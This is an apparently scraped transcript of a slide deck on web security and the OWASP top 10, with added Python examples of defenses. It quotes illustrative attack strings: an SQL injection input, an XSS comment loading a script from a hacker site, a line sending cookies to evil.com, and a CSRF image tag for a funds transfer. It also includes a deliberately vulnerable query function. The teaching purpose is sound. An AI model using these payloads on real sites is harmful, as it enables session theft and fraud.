• FindSecurityBugs
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanation
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 

Web security and OWASP

1. Web Security & OWASP
By Isuru Samaraweera

2. Agenda
• What is web security and why?
• Introduction to OWASP
• OWASP top 10
• OWASP security testing tools
• General security testing tools
• Q & A

3. What is web security and why?
• Security of websites, web applications and web services
• Emergence of Web 2.0
• Intruders exploit vulnerabilities
• Techniques: XSS, SQL injection, etc.
• Attacker profiles
• Catastrophic security hacks
• Sony Entertainment 2011 - 77 million accounts with credit card numbers
• JP Morgan Chase 2014 - 7.6 million accounts' information
• MasterCard 2005 - 40 million accounts
• Business risk
• Trust issues
• Overhead costs
• Security checkpoints and techniques
• Early stages of development

4. OWASP (https://www.owasp.org)
• The Open Web Application Security Project (OWASP)
• Non-profit organization, open community
• Vulnerabilities, threats, attacks and countermeasures
• Development guide: https://www.owasp.org/index.php/Projects/OWASP_Development_Guide
• Testing guide: https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
• Code review guide: https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
• WebGoat sample web application: https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
• Mailing lists: https://lists.owasp.org/mailman/listinfo
• Newsletter: https://www.owasp.org/index.php/Category:OWASP_Newsletter
• Many more…

5. OWASP top 10 (2017)
• Injection
• Broken Authentication and Session Management
• Cross Site Scripting (XSS)
• Broken Access Control
• Security Misconfiguration
• Sensitive Data Exposure
• Missing Function Level Access Control
• Cross Site Request Forgery (CSRF)
• Using Components with Known Vulnerabilities
• Underprotected APIs
6. (#1) Injection
• Send untrusted data into the system
• Text-based attacks
• External, internal parties
• SQL, LDAP, JPQL, XPath, NoSQL
• String query = "SELECT * FROM user_data WHERE lastName='" + request.getParameter("lastName") + "'";
• Query HQLQuery = session.createQuery("FROM user_data WHERE lastName ='" + request.getParameter("lastName") + "'");
• http://example.com/app/userView?lastName=' or '1'='1
8. Preventing Injection
• Avoid dynamic queries
• Parameterized queries
• PreparedStatement, SqlCommand, PDO
• Stored procedures
• Input validation
• Carefully escape special characters if no API is available
• OWASP Enterprise Security API
• ESAPI.encoder().encodeForSQL( new OracleCodec(), queryparam );
• Use code analysis tools
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
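The concatenated lastName query from slide 6 beside its parameterized replacement from slide 8, as an added example that is not part of the deck; it uses Python's built-in sqlite3 and a constructed user_data table, and the allow-list validator is an assumption layered on top of the parameterized query, not a substitute for it.

```python
import re
import sqlite3

# Constructed sample data standing in for the slides' user_data table.
SAMPLE_ROWS = [(101, "Joe", "Snow"), (102, "John", "Smith"), (103, "Jane", "Plane")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (userid INTEGER, firstName TEXT, lastName TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def find_by_last_name_vulnerable(conn: sqlite3.Connection, last_name: str) -> list:
    # Dynamic query built by string concatenation, the pattern shown on slide 6:
    # a quote inside last_name becomes part of the SQL, so "' or '1'='1" matches every row.
    query = "SELECT * FROM user_data WHERE lastName='" + last_name + "'"
    return conn.execute(query).fetchall()


def find_by_last_name_safe(conn: sqlite3.Connection, last_name: str) -> list:
    # Parameterized query (slide 8): the value travels separately from the SQL text,
    # so whatever it contains is compared literally against the column.
    query = "SELECT * FROM user_data WHERE lastName=?"
    return conn.execute(query, (last_name,)).fetchall()


# Assumed allow-list for a surname field: letters, apostrophe, hyphen, space (defense in depth,
# slide 8 "input validation"); it rejects '=' and so the slide-6 payload, but O'Brien still passes.
_LAST_NAME = re.compile(r"[A-Za-z' -]{1,64}")


def is_valid_last_name(last_name: str) -> bool:
    return _LAST_NAME.fullmatch(last_name) is not None


def lookup(conn: sqlite3.Connection, last_name: str) -> list:
    """Validate first, then query with a bound parameter; invalid input returns no rows."""
    if not is_valid_last_name(last_name):
        return []
    return find_by_last_name_safe(conn, last_name)
```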
9. (#2) Broken Authentication and Session Management
• Custom authentication and session management with flaws
• Credentials not protected with hashing
• Insider attacks
• Credentials can be guessed
• Session ID exposed in the URL -> session fixation
• Session IDs never time out
• Session IDs are not rotated on successful logins
• http://website.com/login.php?;jsessionid=2P0OC2JSNDLPSKHCJUN2JV&d

10. Protecting the Password
• Hashing
• Transport
• Storage

11. Crack Password Hash
• Dictionary attack: file containing words, phrases, common passwords
• Brute-force attack: tries every possible combination of characters up to a given length
• Lookup table: dictionary in a lookup table data structure
• Rainbow table: high-performance lookup

12. User Registration with Salt
• App posts the username foo@example.com with password pass
• Server generates a random salt r
• Server computes h = H(r|pass)
• Server stores (foo@example.com, h, r) in DB

13. Simplified login flow
• App posts username foo@example.com and password pass
• Server looks up the salt using the user id
• Server computes the hash h' = H(r|pass)
• If (foo@example.com, h') exists in DB, allow login

14. Attack on password database

15. Hashing with key and random salt
• Is it safe?

16. Hashing recipe
• Bind password hash value to account
• Use application secret
• Follow password hashing best practices
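The registration and login flows of slides 12 and 13 combined with the slide 16 recipe, as an added example that is not part of the deck. H is taken to be PBKDF2-HMAC-SHA256, the account is bound by mixing the user id into the salt, and the application secret is applied as an HMAC key; the secret value, the iteration count and the in-memory dict standing in for the DB are constructed assumptions.

```python
import hashlib
import hmac
import os

# Application secret (slide 16), held outside the database, e.g. in a config store or HSM.
# Constructed value for this example only.
APP_SECRET = bytes.fromhex("1f" * 32)
ITERATIONS = 100_000  # PBKDF2 work factor; take current values from the OWASP Password Storage Cheat Sheet


def hash_password(user_id: str, password: str, salt: bytes) -> bytes:
    # h = H(r | pass) from slide 12, with the user id folded into r so the same password
    # hashes differently per account (slide 16, "bind password hash value to account"),
    # then keyed with the application secret so a dumped table alone cannot be cracked (slide 15).
    salted = hashlib.pbkdf2_hmac("sha256", password.encode(), salt + user_id.encode(), ITERATIONS)
    return hmac.new(APP_SECRET, salted, "sha256").digest()


def register(db: dict, user_id: str, password: str) -> None:
    # Slide 12: the server generates a random salt r and stores (user, h, r).
    salt = os.urandom(16)
    db[user_id] = (hash_password(user_id, password, salt), salt)


def login(db: dict, user_id: str, password: str) -> bool:
    # Slide 13: look up the salt for the user, recompute h' and compare with the stored h.
    record = db.get(user_id)
    if record is None:
        # Spend the same effort for an unknown user so timing does not reveal which
        # accounts exist (the generic-error advice of slide 21 applied to timing).
        hash_password(user_id, password, b"\x00" * 16)
        return False
    stored_hash, salt = record
    # Constant-time comparison avoids leaking how many leading bytes matched.
    return hmac.compare_digest(stored_hash, hash_password(user_id, password, salt))
```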
17. Transport Security of a password

18. Hashing the password on client

19. Encrypt the password
• Asymmetric encryption
• Problems?

20. Preventing broken authentication contd.
• Implement proper password strength controls
• Password length > 10 and < 128
• Password complexity
• at least 1 uppercase character (A-Z)
• at least 1 lowercase character (a-z)
• at least 1 digit (0-9)
• at least 1 special character (punctuation); do not forget to treat space as a special character too
• Not more than 2 identical characters in a row (e.g., 111 not allowed)
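The slide 20 strength rules as one checker that reports every rule a password breaks, added here as an example rather than taken from the deck. The length rule is read as an inclusive 10 to 128 range (an assumption, since the slide writes it as >10<128), and "special" means ASCII punctuation plus the space character, as the slide insists.

```python
import string

MIN_LEN, MAX_LEN = 10, 128
SPECIAL = set(string.punctuation) | {" "}  # space counts as special (slide 20)


def password_policy_violations(password: str) -> list:
    """Return the slide-20 rules the password breaks; an empty list means it passes."""
    problems = []
    if not MIN_LEN <= len(password) <= MAX_LEN:
        problems.append(f"length must be {MIN_LEN}-{MAX_LEN} characters, got {len(password)}")
    if not any("A" <= c <= "Z" for c in password):
        problems.append("no uppercase character (A-Z)")
    if not any("a" <= c <= "z" for c in password):
        problems.append("no lowercase character (a-z)")
    if not any("0" <= c <= "9" for c in password):
        problems.append("no digit (0-9)")
    if not any(c in SPECIAL for c in password):
        problems.append("no special character (punctuation or space)")
    # At most 2 identical characters in a row: 'aa' is allowed, 'aaa' is not.
    for i in range(2, len(password)):
        if password[i] == password[i - 1] == password[i - 2]:
            problems.append(f"3 identical characters in a row starting at position {i - 2}")
            break
    return problems


def is_acceptable(password: str) -> bool:
    return not password_policy_violations(password)
```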
21. Preventing broken authentication contd.
• Authentication and error messages: respond with a generic error message
• Incorrect response examples
• "Login for User foo: invalid password"
• "Login failed, invalid user ID"
• "Login failed; account disabled"
• "Login failed; this user is not active"
• Correct response example
• "Login failed; Invalid userID or password"

22. Preventing broken authentication contd.
• Prevent brute force attacks
• Account lockout
• Multifactor authentication
• Logging and monitoring
• Use of authentication protocols that require no password
• OAuth
• OpenID
• SAML
• Leverage available frameworks and tools
• Apache Shiro
• Spring Security
• OWASP ESAPI
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet

23. Preventing Session Management issues
• Secure login over HTTPS
• Password submitted encrypted
• Immediate redirect to HTTP
• Session ID sent in clear text <- vulnerability

24. Preventing Session Management issues contd.
• User requests an HTTP page, the response redirects to HTTPS
• The 302 response travels over plain HTTP: vulnerability point

25. Preventing Session Management issues contd.
• HSTS - HTTP Strict Transport Security
• Opt-in security control
• Instructs the browser to enforce strict transport security for the site
• HSTS forces:
• All communications over HTTPS
• No insecure HTTP requests sent from the browser
• No option for the user to override untrusted certificates

26. Enabling HSTS
• In Apache, add the following to .htaccess:
• # Use HTTP Strict Transport Security to force client to use secure connections only
• Header always set Strict-Transport-Security "max-age=300; includeSubDomains"
• max-age => The time, in seconds, that the browser should remember that this site is only to be accessed using HTTPS
• includeSubDomains => If this optional parameter is specified, this rule applies to all of the site's subdomains as well
• Can be done in Nginx, IIS etc.

27. Preventing Session Management issues contd.
• HTTP Strict Transport Security (HSTS)
• Cookies
• Secure: <secure>true</secure>
• HttpOnly: <http-only>true</http-only>
• Cache-Control: no-cache,no-store
• Pragma: no-cache
• New session IDs on consecutive logins
28.
• https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet
• https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_authentication
• https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet
29. (#3) Cross Site Scripting (XSS)
• Text-based attack scripts that exploit the interpreter in the browser
• The attacker adds the following comment:
• Great price for a great item! Read my review here <script src="http://hackersite.com/authstealer.js"> </script>.
• document.location=http://evil.com?id=document.cookie

31. Preventing XSS
• HTML escape before inserting untrusted data
• String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );
• & --> &amp;
• < --> &lt;
• > --> &gt;
• JavaScript escape before inserting untrusted data
• <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
• String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );
• CSS escape before inserting untrusted data
• <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>
• String safe = ESAPI.encoder().encodeForCSS( request.getParameter( "input" ) );

32. Preventing XSS contd.
• URL escape before inserting untrusted data
• <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a>
• String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) );
• XSS filters: block requests with dangerous tags, scripts
• OWASP AntiSamy project (HTML and CSS encoding): https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project
• HTML sanitizer project: https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
• https://github.com/mganss/HtmlSanitizer
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
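Context-specific output encoding as described on slides 31 and 32, written here as an added Python example that mirrors what the ESAPI encodeForHTML, encodeForJavaScript and encodeForURL calls do; it is not ESAPI code. The review comment from slide 29 is the constructed input, and the \xHH / \uHHHH scheme for the JavaScript context is an assumption modelled on ESAPI's behaviour.

```python
import html
import re
from urllib.parse import quote

# Constructed: the review comment an attacker posts on slide 29.
COMMENT = ('Great price for a great item! Read my review here '
           '<script src="http://hackersite.com/authstealer.js"> </script>.')

_JS_SAFE = re.compile(r"[A-Za-z0-9]")


def encode_for_html(s: str) -> str:
    # HTML body/attribute context: & < > " ' become entities, so the browser renders the
    # comment as text instead of parsing the <script> tag (slide 31: & --> &amp; etc.).
    return html.escape(s, quote=True)


def encode_for_javascript(s: str) -> str:
    # JavaScript string context: hex-escape everything but alphanumerics, so the value can
    # neither close the quoted string nor end the <script> block it sits in.
    out = []
    for ch in s:
        if _JS_SAFE.match(ch):
            out.append(ch)
        elif ord(ch) < 256:
            out.append(f"\\x{ord(ch):02X}")
        else:
            out.append(f"\\u{ord(ch):04X}")
    return "".join(out)


def encode_for_url(s: str) -> str:
    # URL query-value context: percent-encode everything, including / and &.
    return quote(s, safe="")


def render_review(comment: str) -> str:
    """HTML page fragment: the same untrusted value placed in three different contexts,
    each with the encoder for that context."""
    return (
        f"<p>{encode_for_html(comment)}</p>\n"
        f"<script>var review = '{encode_for_javascript(comment)}';</script>\n"
        f'<a href="http://www.somesite.com?test={encode_for_url(comment)}">link</a>'
    )
```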
33. (#4) Broken Access Control
• Unprivileged function access
• http://example.com/app/getappInfo
• http://example.com/app/admin_getappInfo
• Unauthorized data access
• http://soomebank.com/showacct?id=101
• http://soomebank.com/showacct?id=102
• Prevention
• Access control matrix
• Check access
• Do not assume that users will be unaware of special or hidden URLs or APIs
• Penetration tests
• Regular audits, code reviews, automated verification
• Principle of least privilege
• Principle of defense in depth
• https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference
• https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access

34. (#5) Security Misconfiguration
• Can happen at any level
• Web server
• App server
• Database
• Custom code
• Out-of-date software
• Unnecessary ports, services
• Error message throws a stack trace?
• Framework settings set to secure values? (Struts, Spring, .NET etc.)
• Prevention
• Frequent audits
• Deployment process
• Automate configuration validity checks
• https://www.owasp.org/index.php/Configuration
• https://www.owasp.org/index.php/Error_Handling
• https://www.owasp.org/index.php/Testing_for_configuration_management
• https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)
• https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management

35. (#6) Sensitive Data Exposure
• Passwords, credit card numbers etc. (in transit or at rest)
• Not encrypting sensitive data
• Using weak keys and algorithms to encrypt
• SSL not enabled along the entire path
• Prevention measures
• Encrypt sensitive data properly
• AES-256
• Key-encrypting key
• Hardware security modules
• RSA 2048
• Don't store sensitive data unnecessarily
• Disable caching and auto-completion
• https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_SSL-TLS

36. (#7) Insufficient Attack Protection
• Inability to detect, prevent, and respond to both manual and automated attacks
• Attack with OWASP ZAP, sqlmap tools (http://sqlmap.org/)
• Manual human attack
• Detect attacks -> OWASP AppSensor
• An input a legitimate client can't generate?
• Unusual usage patterns, repeated requests, spikes?
• Respond to attacks -> OWASP AppSensor
• Decide whether to automatically block requests, IP addresses, or IP ranges
• Consider disabling or monitoring misbehaving user accounts
• Patch quickly

38.
• Monitor log files
• Monitor network bandwidth

39.
• https://www.owasp.org/index.php/OWASP_AppSensor_Project
• https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications
• https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet
• https://www.owasp.org/index.php/Virtual_Patching_Cheat_Sheet
• https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
• https://www.owasp.org/index.php/Intrusion_Detection

40. (#8) Cross Site Request Forgery
• Attacker tricks the victim with URLs
• Execute unwanted actions
• Compromise the entire application
• http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
• Attacker emails the URL below to the victim:
• <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

41. Preventing CSRF
• Include a unique token in a hidden field
• Verify the token on each request
• CSRFGuard
• Re-authenticate
• https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
• http://lists.owasp.org/pipermail/owasp-csrfguard
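The hidden-field token defense of slide 41 applied to the transferFunds request of slide 40, written as an added example rather than taken from the deck or from CSRFGuard. The in-memory session store and the request shape (method plus a parameter dict) are constructed assumptions standing in for a real web framework.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> session data.
SESSIONS: dict = {}


def new_session() -> str:
    """Create a session and mint a per-session CSRF token alongside it."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def hidden_field(sid: str) -> str:
    # Slide 41: the legitimate form carries the token in a hidden field. A page on another
    # origin cannot read it, so a forged request cannot include it.
    token = SESSIONS[sid]["csrf_token"]
    return f'<input type="hidden" name="csrf_token" value="{token}">'


def transfer_funds(sid: str, method: str, params: dict) -> str:
    """Handle the slide-40 transferFunds action; returns the outcome as a string."""
    session = SESSIONS.get(sid)
    if session is None:
        return "rejected: no session"
    if method != "POST":
        # The <img src=...> on slide 40 can only issue a GET; state changes require POST,
        # so the image-based forgery is refused before the token is even consulted.
        return "rejected: state change requires POST"
    submitted = params.get("csrf_token", "")
    # Slide 41: verify the token on each request, in constant time.
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return "rejected: missing or invalid CSRF token"
    return f"transferred {params['amount']} to {params['destinationAccount']}"
```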
42. (#9) Using Components with Known Vulnerabilities
• Outdated libraries
• Apache CXF authentication bypass (2012): call with no identity token => invoke any web service with full permission
• Spring remote code execution (2011/2012): Expression Language flaw => execute arbitrary code on the server
• Struts2 remote code execution (2017): mishandles file upload; Content-Type header flaw => execution of arbitrary code on the server

43. Preventing the use of components with known vulnerabilities
• Identify all components and dependent libraries
• OWASP Dependency Check: https://www.owasp.org/index.php/OWASP_Dependency_Check
• Retire.js: https://github.com/retirejs/retire.js/
• Monitor the security of these components
• Mailing lists
• Official sites
• Security policy on 3rd-party libraries
• Software development practices to use
• Passing security tests
• Acceptable licenses
• Wrappers to expose only the required functions of an API
• https://cve.mitre.org/about/
• https://www.owasp.org/index.php/Virtual_Patching_Best_Practices

44. (#10) Underprotected APIs
• REST, JSON, and XML APIs
• Mobile app connecting to a remote API (username, password and account number)
• Public SMS JSON API -> SQL injection
• XML external entity (XXE): an external entity is processed by the XML parser
• Prevention
• Secured communications between the client and your APIs
• Strong authentication scheme for your APIs
• Parser configuration hardened against attack
• Protect against injection of all forms
• https://www.owasp.org/index.php/REST_Security_Cheat_Sheet
• https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet
46. OWASP Testing tools
• The OWASP Application Security Verification Standard (ASVS) Project
• Test web application technical security controls
• Requirements for secure development
• Procurement
• https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project
• OWASP Live CD project
• Best open source security tools in a single bootable environment
• Boot from this Live CD or run it as a VM
• Access to a full security testing suite
• No configuration required
• OWASP ZAP
• https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools

47. General Security Testing tools
• IronWASP (https://ironwasp.org/): over 25 kinds of web vulnerabilities
• Wireshark (https://www.wireshark.org/): network packet analyzer
• Google nogotofail (https://github.com/google/nogotofail): known TLS/SSL vulnerabilities and misconfigurations
• sqlmap (http://sqlmap.org/): SQL injection
• Qualys (https://www.qualys.com)

48. Security code review
• Fastest and most accurate
• Data validation
• Authentication
• Session management
• Authorization
• Cryptography
• Error handling
• Logging
• Security configuration
• Network architecture
• Tools
• Code Crawler
• Orizon
• O2
• FindSecurityBugs